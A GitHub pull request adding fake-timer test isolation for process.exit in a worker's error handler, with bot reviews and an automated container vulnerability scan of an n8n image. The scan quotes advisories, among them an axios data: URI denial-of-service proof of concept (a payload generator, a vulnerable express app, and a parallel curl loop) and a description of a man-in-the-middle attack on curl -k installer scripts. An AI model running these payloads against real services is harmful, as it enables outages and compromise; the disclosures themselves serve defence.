Conversation

@anatolyshipitz (Collaborator) commented Oct 30, 2025

  • Updated tests in src/index.test.ts to use fake timers and ensure that process.exit is called only after the test completes, preventing race conditions.
  • Enhanced test coverage to verify that process.exit is not called immediately and is invoked correctly after a timeout.

These changes improve test reliability and prevent CI/CD failures due to unhandled process exits.

Summary by CodeRabbit

  • Tests
    • Improved test reliability with enhanced async timer handling and comprehensive error handling verification.

- Introduced a new documentation file outlining a bug related to unexpected process.exit calls during test execution, which blocks CI/CD pipelines.
@anatolyshipitz self-assigned this Oct 30, 2025
@coderabbitai bot commented Oct 30, 2025

Walkthrough

Refactors the handleRunError tests to use fake timers for controlling asynchronous behavior, adds cleanup procedures, and introduces new test cases covering process.exit invocation and logging with both string and Error object inputs.

Changes

Cohort / File(s): Test timer handling and error handling (workers/main/src/index.test.ts)
Summary: Implemented fake-timer setup with vi.useFakeTimers() and teardown with vi.runAllTimers() plus timer restoration. Replaced the hard-failing process.exit mock with a no-op. Added tests verifying that process.exit is invoked with code 1 after a 100ms timeout, and that logging works for both string and Error object inputs. A sketch of the pattern follows.
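
A minimal sketch of that pattern (hypothetical shape; the actual test file may differ), assuming handleRunError logs the error and schedules process.exit(1) via a 100ms setTimeout:

import { afterEach, beforeEach, expect, it, vi } from 'vitest';
import { handleRunError } from './index'; // hypothetical import path

beforeEach(() => {
  vi.useFakeTimers();
  // No-op mock so the test process is never actually terminated.
  vi.spyOn(process, 'exit').mockImplementation(() => undefined as never);
});

afterEach(() => {
  vi.runAllTimers(); // flush any scheduled exit while the mock is still active
  vi.useRealTimers();
  vi.restoreAllMocks();
});

it('calls process.exit(1) only after the 100ms timeout', () => {
  handleRunError(new Error('test error'));
  expect(process.exit).not.toHaveBeenCalled(); // not immediate
  vi.advanceTimersByTime(100);
  expect(process.exit).toHaveBeenCalledWith(1);
});

Running all pending timers in afterEach, before restoring mocks, is what prevents the race: any exit scheduled by a test still hits the mocked process.exit rather than the real one.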

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

  • Straightforward test refactoring with consistent patterns across setup/teardown and new test cases
  • Verify timer mock behavior aligns with handleRunError implementation expectations
  • Ensure new test assertions correctly validate process exit code and logging side effects

Poem

A rabbit hops through test files with glee,
Fake timers ticking in harmony,
Mock exits and logs now shine so bright,
Error handling tested just right! 🐰⏱️
The tests now run with perfect timing,
All async behaviors aligning! ✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)

  • Docstring Coverage ⚠️ Warning: Docstring coverage is 0.00%, which is below the required threshold of 80.00%. Resolution: run @coderabbitai generate docstrings to improve docstring coverage.

✅ Passed checks (2 passed)

  • Description Check ✅ Passed: Check skipped because CodeRabbit's high-level summary is enabled.
  • Title Check ✅ Passed: The PR title "Add test isolation for process.exit in handleRunError function" accurately and directly describes the main objective of the changeset. The test file modifications implement fake timers, prevent process.exit race conditions, and enhance test coverage specifically for process.exit behavior, all of which align with the stated goal of adding test isolation. The title is concise, specific, and clearly communicates to reviewers that this PR addresses timing and test isolation issues in the handleRunError tests.
✨ Finishing touches
  • 📝 Generate docstrings
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch issue/process-exit-test-race-condition

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.


Comment @coderabbitai help to get the list of available commands and usage tips.

- Deleted the documentation file outlining the bug related to unexpected process.exit calls during test execution, which was previously blocking CI/CD pipelines.
- This removal reflects the resolution of the issue and the completion of related fixes in the testing framework.

The changes streamline the documentation and indicate that the problem has been addressed.
@github-actions bot commented Oct 30, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
  Digest: sha256:7c11dcf942a81036772fabcad50900407be2d0f48bb028586b035fe243c70b89
  Vulnerabilities: critical: 2, high: 14, medium: 0, low: 0
  Platform: linux/amd64
  Size: 335 MB
  Packages: 1844
📦 Base Image: node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
  Digest: sha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
  Vulnerabilities: critical: 0, high: 1, medium: 2, low: 2
libxml2 2.13.8-r0 (apk): critical: 2, high: 2, medium: 0, low: 0

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical: CVE-2025-49796
  Affected range: <2.13.9-r0
  Fixed version: 2.13.9-r0
  EPSS Score: 0.438% (62nd percentile)

critical: CVE-2025-49794
  Affected range: <2.13.9-r0
  Fixed version: 2.13.9-r0
  EPSS Score: 0.251% (48th percentile)

high: CVE-2025-6021
  Affected range: <2.13.9-r0
  Fixed version: 2.13.9-r0
  EPSS Score: 0.546% (67th percentile)

high: CVE-2025-49795
  Affected range: <2.13.9-r0
  Fixed version: 2.13.9-r0
  EPSS Score: 0.141% (35th percentile)
xlsx 0.20.2 (npm): critical: 0, high: 2, medium: 0, low: 0

pkg:npm/xlsx@0.20.2

high 7.8: CVE-2023-30533 (OWASP Top Ten 2017 Category A9: Using Components with Known Vulnerabilities)
  Affected range: >=0
  Fixed version: Not fixed
  CVSS Score: 7.8
  CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
  EPSS Score: 4.328% (88th percentile)

Description

All versions of SheetJS CE through 0.19.2 are vulnerable to prototype pollution when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE-2024-22363 (OWASP Top Ten 2017 Category A9: Using Components with Known Vulnerabilities)
  Affected range: >=0
  Fixed version: Not fixed
  CVSS Score: 7.5
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  EPSS Score: 0.079% (24th percentile)

Description

SheetJS Community Edition before 0.20.2 is vulnerable to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

axios 1.11.0 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.11.0

high 7.5: CVE-2025-58754 (Allocation of Resources Without Limits or Throttling)
  Affected range: >=1.0.0, <1.12.0
  Fixed version: 1.12.0
  CVSS Score: 7.5
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  EPSS Score: 0.025% (5th percentile)
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini real-app PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength and fully decodes the payload into memory on Node before streaming, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 POST requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit (see the sketch after this list).

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
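
A minimal sketch of the first suggestion, using a hypothetical guard function (names are illustrative, not axios's actual fix). Base64 decodes at a 4:3 ratio, so the decoded size can be bounded without decoding anything:

// Hypothetical pre-decode guard for the data: branch of the Node adapter.
function assertDataUriWithinLimits(uri, config) {
  const comma = uri.indexOf(',');
  const payloadLength = comma === -1 ? 0 : uri.length - comma - 1;
  // Estimate the decoded size from the Base64 length (4 chars -> 3 bytes).
  const estimatedBytes = Math.floor((payloadLength * 3) / 4);
  const limit = config.maxContentLength > -1 ? config.maxContentLength : Infinity;
  if (estimatedBytes > limit) {
    throw new Error(
      `data: URI payload (~${estimatedBytes} bytes) exceeds maxContentLength (${limit})`,
    );
  }
}

// Usage (hypothetical): call before fromDataURI() inside the data: branch,
// e.g. assertDataUriWithinLimits(config.url, config);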

n8n-nodes-base 1.107.0 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA-365g-vjw2-grx8 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
  Affected range: <=1.113.0
  Fixed version: Not fixed
  CVSS Score: 8.8
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE='["n8n-nodes-base.executeCommand"]'

References

n8n docs: Execute Command
n8n docs: Blocking nodes

n8n 1.109.2 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/n8n@1.109.2

high 8.8: GHSA-365g-vjw2-grx8 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
  Affected range: <=1.114.4
  Fixed version: Not fixed
  CVSS Score: 8.8
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description: the advisory text is identical to the n8n-nodes-base GHSA-365g-vjw2-grx8 entry above (only the affected range differs, as noted).

axios 1.8.3 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.8.3

high 7.5: CVE-2025-58754 (Allocation of Resources Without Limits or Throttling)
  Affected range: >=1.0.0, <1.12.0
  Fixed version: 1.12.0
  CVSS Score: 7.5
  CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  EPSS Score: 0.025% (5th percentile)
Description: identical to the axios 1.11.0 CVE-2025-58754 entry above (same summary, details, PoC, and suggestions).

openssl 3.5.2-r0 (apk): critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high: CVE-2025-9230
  Affected range: <3.5.4-r0
  Fixed version: 3.5.4-r0
  EPSS Score: 0.026% (6th percentile)
tar-fs 2.1.3 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/tar-fs@2.1.3

high 8.7: CVE-2025-59343 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))
  Affected range: >=2.0.0, <2.1.4
  Fixed version: 2.1.4
  CVSS Score: 8.7
  CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
  EPSS Score: 0.024% (5th percentile)

Description

Impact

Affects v3.1.0, v2.1.3, v1.16.5 and below.

Patches

Patched in 3.1.1, 2.1.4, and 1.16.6.

Workarounds

You can use the ignore option to skip entries that are not regular files or directories:

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }
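
For context, a minimal usage sketch of that workaround (file and directory names here are hypothetical; this assumes tar-fs's stream-based extract API):

const fs = require('fs');
const tar = require('tar-fs');

// Extract only regular files and directories; returning true from ignore
// skips everything else (symlinks, hardlinks, devices, etc.).
fs.createReadStream('untrusted-archive.tar').pipe(
  tar.extract('./output', {
    ignore (_, header) {
      return header.type !== 'file' && header.type !== 'directory';
    },
  }),
);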

Credit

Reported by: Mapta / BugBunny_ai

expat 2.7.1-r0 (apk): critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high: CVE-2025-59375
  Affected range: <2.7.2-r0
  Fixed version: 2.7.2-r0
  EPSS Score: 0.102% (29th percentile)
curl 8.14.1-r1 (apk): critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high: CVE-2025-9086
  Affected range: <8.14.1-r2
  Fixed version: 8.14.1-r2
  EPSS Score: 0.077% (24th percentile)
playwright 1.54.2 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/playwright@1.54.2

high 8.7: CVE-2025-59288 (Improper Verification of Cryptographic Signature)
  Affected range: <1.55.1
  Fixed version: 1.55.1
  CVSS Score: 8.7
  CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
  EPSS Score: 0.027% (6th percentile)
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate. In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.
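
A hedged sketch of the safer pattern (placeholder file and URL names carried over from the snippet above; the project's actual fix may differ): keep TLS verification enabled and, where possible, pin an expected checksum before installing.

# Keep certificate validation on; --fail aborts on HTTP errors instead of saving error pages.
curl --retry 3 --fail -o ./<pkg-file> <url>
# Optionally verify a known-good digest before handing the package to the installer.
echo "<expected-sha256>  ./<pkg-file>" | shasum -a 256 -c -
sudo installer -pkg ./<pkg-file> -target /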

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.


Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket


openssh 10.0_p1-r7 (apk): critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high: CVE-2023-51767
  Affected range: <=10.0_p1-r7
  Fixed version: Not fixed
  EPSS Score: 0.008% (1st percentile)

@sonarqubecloud left a comment

@coderabbitai bot left a comment

Actionable comments posted: 0

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
workers/main/src/index.test.ts (1)

46-55: Remove duplicate test case.

This test case duplicates the coverage from lines 25-35. Both verify that handleRunError logs the error message when passed an Error object. The test on lines 25-35 already provides this coverage.

Apply this diff to remove the duplicate:

-  it('should log when error is an Error object', () => {
-    const error = new Error('error from Error object');
-    const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});
-
-    handleRunError(error);
-    expect(logSpy).toHaveBeenCalledWith(
-      `Error in main worker: ${error.message}`,
-    );
-    logSpy.mockRestore();
-  });
-
🧹 Nitpick comments (1)
workers/main/src/index.test.ts (1)

57-73: Excellent test coverage for the timeout behavior.

This test properly verifies that process.exit is not called immediately but is invoked after the 100ms timeout, which directly addresses the race condition issue described in the PR objectives.

Note: The logSpy on line 59 is created and restored but never used in assertions. If it's intended to suppress console output, consider adding a comment to clarify its purpose, or remove it if unnecessary:

  it('should call process.exit with code 1 after timeout', () => {
    const error = new Error('test error');
-    const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});

    handleRunError(error);

    // Process.exit should not be called immediately
    expect(processExitSpy).not.toHaveBeenCalled();

    // Fast-forward time by 100ms
    vi.advanceTimersByTime(100);

    // Now process.exit should have been called
    expect(processExitSpy).toHaveBeenCalledWith(1);
-
-    logSpy.mockRestore();
  });
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR, between d9b7191 and 0c52f2d.

📒 Files selected for processing (1)
  • workers/main/src/index.test.ts (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
**/*.test.ts

📄 CodeRabbit inference engine (CLAUDE.md)

Tests are co-located with source files and should be named with the pattern *.test.ts

Files:

  • workers/main/src/index.test.ts
**/*.{ts,tsx}

📄 CodeRabbit inference engine (CLAUDE.md)

**/*.{ts,tsx}: Follow the function naming pattern: prefix? + action (A) + high context (HC) + low context? (LC), using action verbs such as get, fetch, send, create, validate, handle, calculate, and boolean prefixes is, has, should
Use descriptive, unabbreviated variable names; use singular for single values and plural for collections; ensure variable names are context-specific

Files:

  • workers/main/src/index.test.ts
🧠 Learnings (2)
📓 Common learnings
Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.
📚 Learning: 2025-08-05T13:42:48.295Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: CLAUDE.md:0-0
Timestamp: 2025-08-05T13:42:48.295Z
Learning: Applies to workers/main/vitest.config.ts : Test configuration should be defined in workers/main/vitest.config.ts

Applied to files:

  • workers/main/src/index.test.ts
🧬 Code graph analysis (1)
workers/main/src/index.test.ts (1)
workers/main/src/index.ts (2)
  • logger (8-8)
  • handleRunError (43-48)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
🔇 Additional comments (2)
workers/main/src/index.test.ts (2)

8-15: LGTM! Fake timers setup properly isolates timing behavior.

The use of fake timers and the no-op mock for process.exit correctly prevents race conditions and actual process termination during tests.


17-23: Good cleanup pattern to prevent timer leaks.

Running all pending timers before restoring mocks ensures that any scheduled process.exit calls use the mocked version rather than the real one. This effectively prevents race conditions.

@anatolyshipitz merged commit 6d2b90e into main on Oct 30, 2025 (12 checks passed).
@anatolyshipitz deleted the issue/process-exit-test-race-condition branch on October 30, 2025 at 11:08.